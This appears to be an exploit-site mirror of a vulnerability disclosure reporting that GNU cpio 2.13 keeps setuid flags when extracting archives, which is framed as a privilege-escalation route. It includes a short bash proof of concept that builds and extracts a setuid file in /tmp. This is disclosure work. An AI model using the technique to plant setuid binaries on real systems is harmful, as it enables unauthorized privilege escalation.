Share
## https://sploitus.com/exploit?id=PACKETSTORM:176425
cpio privilege escalation vulnerability via setuid files in cpio archive  
  
Happy New Year, let in 2024 happiness be with you! :)  
  
When extracting archives cpio (at least version 2.13) preserves  
the setuid flag, which might lead to privilege escalation.  
  
One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r  
without further interaction from root.  
  
We believe this is vulnerability, since directory traversal in cpio  
is considered vulnerability.  
  
The POC is trivial, including bash script.  
  
<pre>  
====  
#!/bin/bash  
# cpio privilege escalation via setuid files in cpio archive  
# author: Georgi Guninski  
# date: Mon Jan 8 07:28:28 AM UTC 2024  
# tested on cpio (GNU cpio) 2.13  
  
mkdir -p /tmp/1  
cd /tmp/1  
touch a  
chmod 4555 a  
echo -n a | cpio -ocv0 > a.cpio  
mkdir -p /tmp/2  
cd /tmp/2  
cpio -iv < ../1/a.cpio  
ls -lh /tmp/2/a  
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a  
====  
</pre>